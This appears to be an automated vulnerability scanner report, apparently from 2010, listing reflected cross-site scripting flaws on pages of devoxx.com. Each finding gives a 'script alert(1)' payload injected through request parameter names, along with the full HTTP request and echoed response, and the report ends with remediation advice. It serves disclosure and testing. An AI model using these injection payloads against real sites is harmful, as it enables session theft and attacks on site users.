Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://devoxx.com/display/Devoxx2K10/Contact+Us [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Contact+Us
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6c9c5--><script>alert(1)</script>329e4ea39cd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Contact+Us?6c9c5--><script>alert(1)</script>329e4ea39cd=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:40 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842960278
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35864
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Contact+Us?6c9c5--><script>alert(1)</script>329e4ea39cd=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@381c692d adaptavist.builder.helper: com.atlass ...[SNIP]...
1.2. http://devoxx.com/display/Devoxx2K10/Devoxx+2008 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Devoxx+2008
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload cecbd--><script>alert(1)</script>01ad4165a5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Devoxx+2008?cecbd--><script>alert(1)</script>01ad4165a5a=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:26 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843006197
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 140846
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Devoxx+2008?cecbd--><script>alert(1)</script>01ad4165a5a=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@1380179f adaptavist.builder.helper: com.atlass ...[SNIP]...
1.3. http://devoxx.com/display/Devoxx2K10/Devoxx+2009 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Devoxx+2009
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4b156--><script>alert(1)</script>9c82cd46bd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Devoxx+2009?4b156--><script>alert(1)</script>9c82cd46bd5=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:44:30 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843070377
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 174350
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Devoxx+2009?4b156--><script>alert(1)</script>9c82cd46bd5=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@2821886c adaptavist.builder.helper: com.atlass ...[SNIP]...
The value of the a8f51--><script>alert(1)</script><H1>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM</H1> request parameter is copied into the HTML document as plain text between tags. The payload 92591<script>alert(1)</script>ed41ee64bf1 was submitted in the a8f51--><script>alert(1)</script><H1>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM</H1> parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the a8f51--><script>alert(1)</script><font%20color request parameter is copied into the name of an HTML tag. The payload 8b688><script>alert(1)</script>a75c5490369 was submitted in the a8f51--><script>alert(1)</script><font%20color parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the a8f51--><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM request parameter is copied into the HTML document as plain text between tags. The payload b0d96<script>alert(1)</script>c9b2c36aef6 was submitted in the a8f51--><script>alert(1)</script>HOYT.LLC.XSS.PoC.11.15.2010.DEVOXX.COM parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the a8f51--><script>alert(1)</script>db69e0aef33 request parameter is copied into the HTML document as plain text between tags. The payload f89e1<script>alert(1)</script>3201c43307f was submitted in the a8f51--><script>alert(1)</script>db69e0aef33 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:35:56 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842556120
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38411
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; ...[SNIP]... </script>db69e0aef33=1f89e1<script>alert(1)</script>3201c43307f' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@2db3dffd adaptavist.builder.helper: com.atlassia ...[SNIP]...
1.8. http://devoxx.com/display/Devoxx2K10/Home [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Home
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 10455--><script>alert(1)</script>0b98aba86be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:36:15 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842575740
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38370
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; ...[SNIP]... 727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Home?10455--><script>alert(1)</script>0b98aba86be=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@555cc586 adaptavist.builder.helper: com.atlass ...[SNIP]...
1.9. http://devoxx.com/display/Devoxx2K10/Javaholics [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Javaholics
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5079f--><script>alert(1)</script>6c6c8244915 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Javaholics?5079f--><script>alert(1)</script>6c6c8244915=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:26 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842826176
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 131053
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Javaholics?5079f--><script>alert(1)</script>6c6c8244915=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@219107ac adaptavist.builder.helper: com.atlass ...[SNIP]...
1.10. http://devoxx.com/display/Devoxx2K10/Jboss [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Jboss
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 579a4--><script>alert(1)</script>b3f778dd671 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Jboss?579a4--><script>alert(1)</script>b3f778dd671=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:10 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842930541
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35549
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Jboss?579a4--><script>alert(1)</script>b3f778dd671=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@28c0e5ed adaptavist.builder.helper: com.atlass ...[SNIP]...
1.11. http://devoxx.com/display/Devoxx2K10/News [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/News
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 35f79--><script>alert(1)</script>b25f2783080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/News?35f79--><script>alert(1)</script>b25f2783080=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:12 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842812010
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38188
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/News?35f79--><script>alert(1)</script>b25f2783080=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@3a01ab9c adaptavist.builder.helper: com.atlass ...[SNIP]...
1.12. http://devoxx.com/display/Devoxx2K10/Newsletter [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Newsletter
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4c08e--><script>alert(1)</script>092395d5d3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Newsletter?4c08e--><script>alert(1)</script>092395d5d3c=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:27 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842947522
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 37934
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Newsletter?4c08e--><script>alert(1)</script>092395d5d3c=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@305a36d4 adaptavist.builder.helper: com.atlass ...[SNIP]...
1.13. http://devoxx.com/display/Devoxx2K10/Oracle [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Oracle
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a2a9c--><script>alert(1)</script>b30a96574db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Oracle?a2a9c--><script>alert(1)</script>b30a96574db=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:20 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842940633
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35040
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Oracle?a2a9c--><script>alert(1)</script>b30a96574db=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@4caf8a0c adaptavist.builder.helper: com.atlass ...[SNIP]...
1.14. http://devoxx.com/display/Devoxx2K10/Partners [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Partners
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e7bf9--><script>alert(1)</script>834c95c00a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Partners?e7bf9--><script>alert(1)</script>834c95c00a5=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:04 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842804782
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 34094
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Partners?e7bf9--><script>alert(1)</script>834c95c00a5=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@b64716e adaptavist.builder.helper: com.atlassi ...[SNIP]...
1.15. http://devoxx.com/display/Devoxx2K10/Practical [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Practical
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 87fb1--><script>alert(1)</script>fa619441419 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Practical?87fb1--><script>alert(1)</script>fa619441419=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:12 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842812479
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 35083
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Practical?87fb1--><script>alert(1)</script>fa619441419=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@7e6b6109 adaptavist.builder.helper: com.atlass ...[SNIP]...
1.16. http://devoxx.com/display/Devoxx2K10/Privacy+Policy [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Privacy+Policy
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 77c41--><script>alert(1)</script>111adc9d0f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Privacy+Policy?77c41--><script>alert(1)</script>111adc9d0f1=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:42:40 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842960557
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 41989
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Privacy+Policy?77c41--><script>alert(1)</script>111adc9d0f1=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@7874036d adaptavist.builder.helper: com.atlass ...[SNIP]...
1.17. http://devoxx.com/display/Devoxx2K10/Schedule [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Schedule
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 94dc9--><script>alert(1)</script>2d39d89cec9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Schedule?94dc9--><script>alert(1)</script>2d39d89cec9=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:40:10 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842810669
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 38725
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Schedule?94dc9--><script>alert(1)</script>2d39d89cec9=1' contextPath : '' action name : 'viewpage' ********* adaptavist.builder.sitemeshPage: com.opensymphony.module.sitemesh.parser.FastPage@758d7c42 adaptavist.builder.helper: com.atlass ...[SNIP]...
1.18. http://devoxx.com/display/Devoxx2K10/Schedule+REST+interface [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://devoxx.com
Path:
/display/Devoxx2K10/Schedule+REST+interface
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8b508--><script>alert(1)</script>c8a72497573 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Schedule+REST+interface?8b508--><script>alert(1)</script>c8a72497573=1 HTTP/1.1
Host: devoxx.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:41:29 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842889847
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 75562
